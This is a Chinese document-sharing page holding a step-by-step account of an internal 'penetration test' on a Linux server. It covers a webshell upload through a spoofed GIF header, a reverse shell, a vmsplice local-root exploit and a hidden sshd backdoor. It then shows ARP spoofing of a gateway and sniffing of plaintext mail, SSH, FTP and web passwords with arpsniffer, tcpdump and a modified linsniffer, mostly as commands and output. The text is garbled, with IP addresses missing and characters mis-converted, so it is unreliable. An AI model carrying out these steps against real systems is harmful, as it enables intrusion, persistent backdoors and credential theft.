
下載本文檔
版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)
文檔簡介
1、linux下arp欺騙嗅探內(nèi)部滲透測試linux下arp哄騙嗅探內(nèi)部滲透測試 早就跟相關(guān)人員說過郵箱認證smtp和pop協(xié)議要做加密,否則在公司內(nèi)網(wǎng),太簡單被人sniffer到明文密碼了,另外郵箱密碼和公用, bbs也是采納的http協(xié)議,沒實用https,這些都是問題。雖然我們控制的網(wǎng)絡(luò)部分已經(jīng)做過處理了,ip和mac地址做了綁定,即使有人做arp欺 騙后,除非不出網(wǎng)關(guān),否則哄騙后網(wǎng)絡(luò)到達不了網(wǎng)關(guān)之外,因此嗅探明文郵箱密碼已經(jīng)不行能(因為郵箱服務(wù)器不在同一網(wǎng)段)。但是對于我們一些共用資源的服務(wù) 器有公網(wǎng)ip和內(nèi)網(wǎng)ip且處于一個相對風(fēng)險較高,而且沒有按照平安級別舉行過相應(yīng)的平安策略的網(wǎng)絡(luò)環(huán)境內(nèi)
2、,因此一些問題是自不待言的,但是某些人根本不以 為然。所以我舉行了一次容易的內(nèi)部滲透測試。 首先我從有公網(wǎng)ip和內(nèi)網(wǎng)ip的網(wǎng)絡(luò)段入手,如公網(wǎng)ip段是/55,內(nèi)網(wǎng)ip段/。 經(jīng)過踩點發(fā)覺7(7)上跑了一個老版本的某的。經(jīng)過檢測,存在上傳漏洞,利用gif89a文件頭哄騙漏洞上傳webshell。然后上傳個nst。 1: 利用too里面的反彈銜接: 首先在本地用 -l -p 5546監(jiān)聽端口 4: 然后在nst上點back connect 2:(注重紅色
3、部分) 勝利登陸 3: 在本地nc的窗口操作: uid=99(nobody) gid=99(nobody) groups=99(nobody) 權(quán)限低了點,可以利用前一段時光linux內(nèi)核vmsplice本地提升權(quán)限漏洞。先用nst上傳代碼: 6:(注重紅色部分,上傳勝利) 回到nc窗口: in.c /tmp /tmp ls in.c nst_c_bc_c.c sess_af927ee319af5d5569b61ac520e53fcf ssh-zeofp16753 tunl0 gcc -o in in.c ls in in.c nst_c_bc_c.c sess_af927ee319af5d5
4、569b61ac520e53fcf ssh-zeofp16753 tunl0 /tmp/in bash: no job conol in this shell rootbbs111 tmp id uid=0(root) gid=0(root) groups=99(nobody) rootbbs111 tmp 已經(jīng)是root權(quán)限了,下一步上傳俺修改過的常用的后門,這個以前寫過 一篇文章介紹如何留后門的,這里就不講述了(替換sshd和部分,可躲藏端口、銜接、文件、進程等)。 擦擦pp,舉行下一步我們的重點。 我們還是挺直用后門sshd登錄。還是ssh舒適點:) 在securecrt下利用rz指令上
5、傳我們用到的arpsniffer.c,然后編譯: rootbbs111 root gcc -i/usr/local/include -l/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -et 報錯,可能是沒裝libnet的緣故,看解釋make: first you must install pcap and libnet 確定arpsniffer.c需要先裝pcap和 libnet。 rootbbs111 root rpm -ivh libnet--2.1.fc2.rf.i386.rpm rootbbs111 root wget
6、rootbbs111 root tar zxvf libpcap-0.8.1.tar.gz rootbbs111 root cd libpcap-0.8.1 rootbbs111 libpcap-0.8.1 ./configure rootbbs111 libpcap-0.8.1 make rootbbs111 libpcap-0.8.1 make install 預(yù)備工作已經(jīng)ok。下面重新編譯arpsniffer.c rootbbs111 root gcc -i/usr/local/include -l/usr/local/lib -o arpsniffer arpsniffer.c -lp
7、cap -lnet 這次沒報錯,編譯勝利。 rootbbs111 root ./arpsniffer = =arp sniffer= =write by paris-ye= =usage: ./arpsniffer -i interface -m self ip -w workion ip -s server ip -p port =for ample: ./arpsniffer -i eth0 -m -w -s 54 下面開頭哄騙,因為是服務(wù)器端,因此我們哄騙網(wǎng)關(guān):(網(wǎng)絡(luò)環(huán)境如下,郵件服務(wù)器ip:1
8、網(wǎng)關(guān): 本機:7) rootbbs111 root ./arpsniffer -i eth0 -m 7 -w -s 1 -p 110 110 110 get network cards mac aress: m- 00:0e:a6:a5:80:4f w- 00:0f:e2:23:05:d0 s- 00:d0:b7:88:07:59 now start. . . 在另一個登錄里面用監(jiān)聽下: rootbbs111 root tcpdump -i eth0 host
9、1 發(fā)覺有數(shù)據(jù),把監(jiān)聽的數(shù)據(jù)存在文件里面: rootbbs111 root tcpdump -i eth0 host 2 -w pop.txt 10分鐘后停止,在securecrt下用sz指令下載pop.txt到本地,然后用ethereal分析。果真發(fā)覺明文用戶名和密碼。 下面我們就可以用linsniffer監(jiān)聽我們想要的用戶名和密碼了。 先修改linsniffer.c:按照自己的需求監(jiān)聽相應(yīng)的應(yīng)用密碼。我的如下: if(ntohs(tcp- dest)=21) p=1; /* */ if(ntohs(tcp- dest)=22) p=1; /* ssh for compa
10、rison add for example only comment out if desired*/ if(ntohs(tcp- dest)=23) p=1; /* */ if(ntohs(tcp- dest)=80) p=1; /* http */ if(ntohs(tcp- dest)=110) p=1; /* pop3 */ if(ntohs(tcp- dest)=513) p=1; /* rlogin */ if(ntohs(tcp- dest)=106) p=1; /* pop */ rootbbs111 root gcc -o linsniffer linsniffer.c in included from /usr/include/linux/tcp.h:21, from linsniffer.c:32: /usr/include/asm/byteorder.h:6:2: warning: warning using private kernel header; include endian.h instead! 不用管警告,挺直運行編譯后的linsniffer即可。 rootbbs111 root ./linsniffer
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 中醫(yī)崩漏護理查房
- 碧綠的大圓盤課件
- 2025年 廣西中煙考試筆試試卷附答案
- 值班主管培訓(xùn)
- 腎內(nèi)科護理會診
- 重癥超聲心臟分段超聲
- 中職心理健康第十課
- 中醫(yī)一般護理常規(guī)
- 中餐服務(wù)培訓(xùn)
- 大數(shù)據(jù)視域下事業(yè)單位檔案管理的優(yōu)化路徑研究
- 金融系統(tǒng)反洗錢考試題庫(含答案)
- 《短歌行》《歸園田居(其一)》比較閱讀
- 隨班就讀學(xué)生“一人一案”個別化教育工作手冊
- 女患者尿道口護理操作標(biāo)準(zhǔn)
- 食物與藥物的相互作用
- 規(guī)范申報專題培訓(xùn)-課件
- 精神病癥狀學(xué)(psychopathology)課件
- 華泰基本面輪動系列之七:行業(yè)配置策略趨勢追蹤視角
- “一站到底”知識競賽題庫及答案(1590題)
- GB∕T 19673.1-2013 滾動軸承 套筒型直線球軸承附件 第1部分 1、3系列外形尺寸和公差
- 亞馬遜品牌授權(quán)書(英文模板)
評論
0/150
提交評論